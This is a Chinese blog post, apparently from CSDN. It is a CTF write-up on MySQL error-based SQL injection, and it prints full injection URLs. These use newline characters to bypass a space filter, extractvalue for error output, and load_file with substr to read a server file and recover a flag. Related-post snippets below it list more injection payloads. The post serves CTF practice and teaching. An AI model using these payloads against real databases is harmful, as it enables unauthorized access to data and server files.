mysql报错注入ctf_CTF练习平台——报错注入

最新推荐文章于 2024-04-03 19:47:44 发布
最新推荐文章于 2024-04-03 19:47:44 发布
阅读量217 收藏
点赞数
文章标签: mysql报错注入ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42119989/article/details/114347182
版权

bf5edd484957

TIM截图20180208125700.png

这道题过滤了单引号、双引号等,最主要是过滤了空格,根据mysql的特性,我们可以用换行符代替空格符

这里我通过extractvalue报错,注入语句如下

http://103.238.227.13:10088/?id=1%0Aand%0aextractvalue(1,concat(0x7e,(select%0a@@version),0x7e))

bf5edd484957

成功报错

接下来根据题目提示我们要读取文件

http://103.238.227.13:10088/?id=1%0Aand%0a(extractvalue(1,concat(0x7e,(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))),0x7e)))

bf5edd484957

TIM截图20180208140201.png

extractvalue性质就是只能读32位,经过hex后得到的有用位是16位

事实上这个是函数截断了,读取文件本身没问题,所以接下来用strsub试试

http://103.238.227.13:10088/?id=1%0aand%0a(extractvalue(1,concat(0x7e,substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))%0afrom%0a161%0afor%0a20),0x7e)))

bf5edd484957

TIM截图20180208140835.png

接下来只要修改偏移逐渐恢复文件就行了

最后恢复的文件为:

得到flag:

Flag:”7249f5a7fd1de602b30e6f39aea6193a”

司幽幽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 2867
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
mysql注入ctf_CTF考点总结-sql注入
weixin_36488760的博客
01-28 1083
整理下sql相关知识,查漏补缺(长期更新)常用语句及知识information_schema包含了大量有用的信息,例如下图mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码当前用户:select user()数据库版本:select version() , select @@versi...
SQL靶场练习之二(空格绕过、报错注入
Lorezon的博客
01-16 723
空格绕过 初始页面是这样的: 0x00判断是否存在注入 在name后面加个单引号,发现页面返回异常: 判断存在注入。 0x02常规拼接 name’ and 1=1 返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23 页面返回正常,说明绕过成功。 0x03判断字段 name’/**/order/**/by/*...
sql注入 之 报错注入 练习
qq_41619455的博客
08-02 293
sql 报错注入
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2529
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此题 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py ...
ctf】sql注入——报错注入
wlllllianqing的博客
09-14 1000
报错注入 报错注入主要利用执行的报错返回的信息来进行注入从而获得需要的信息。 报错注入有许多的函数可以使用 例如: floor(rand()*2); updatexml函数:or updatexml(1,concat(0x7e,(version())),0); updatexml第二个参数需要的是Xpath格式的字符串。输入不符合,因此报错。 *updatexml的最大长度是32位。 and extractvalue(1,concat(0x7e,(select database()))) and exp(
CTFHUB-报错注入
Web学习之路
03-21 228
理解
CTFHub - 报错注入
Have_a_great_day的博客
09-09 596
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTF学习笔记:SQL注入(显错注入)
a12332251的博客
12-07 715
SQL注入
CTF报错注入、整数型注入、字符型注入
qq_26335381的博客
11-03 1030
SQL注入语句有时候会使用替换查询技术,就是让原有的查询语句查不到结果出错,而让自己构造的查询语句执行,并把执行结果代替原有查询语句查询结果显示出来。
CTFHUB(WEB) 报错注入
qq_54929891的博客
09-17 346
在经历了整数型注入和数字注入后自信满满的打开了报错注入,结果不回显正确内容,只回显正确或错误的情况让我无从下手,没办法,身为小白只能继续去找资料学习一下如何做这种题目了 学了一会儿,发现有很多办法,但我学的是最简单的一种办法,其他办法以后在实践中慢慢的学习 这个方法利用的是count(),rand(),floor(),group by()这几个函数的组合来利用报错信息出来我们需要查询的内容 count():返回匹配指定条件的行数。count(*)返回表中的记录数(不添加的话会出现列不对应的情况,可以试
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
ctfhub技能树之SQL注入报错注入
最新发布
2303_81631620的博客
04-03 839
1.判断注入类型,场景中仅仅将SQL语句带入查询返回页面正确,没有返回点的时候,需要报错注入,用报错的回显extractvalue报错注入:0x7e就是~用来区分数据里面用select语句,不能用union selectconcat()函数1).功能:将多个字符串连接成一个字符串。2).语法:concat(str1,str2,…)返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null。2.查询当前使用的数据库,报错,出现库名 sqli3.
CTFhub 报错注入
plant1234的博客
06-16 221
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
ctf_awd_platform
10-23
ctf_awd_platform是指一种特定的AWD平台,其目的是为了提供一个安全的环境,让参赛选手能够在其中进行攻击和防御的实战训练。 在ctf_awd_platform中,参赛选手将分为多个小队,每个小队都需要同时进行攻击和防御。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值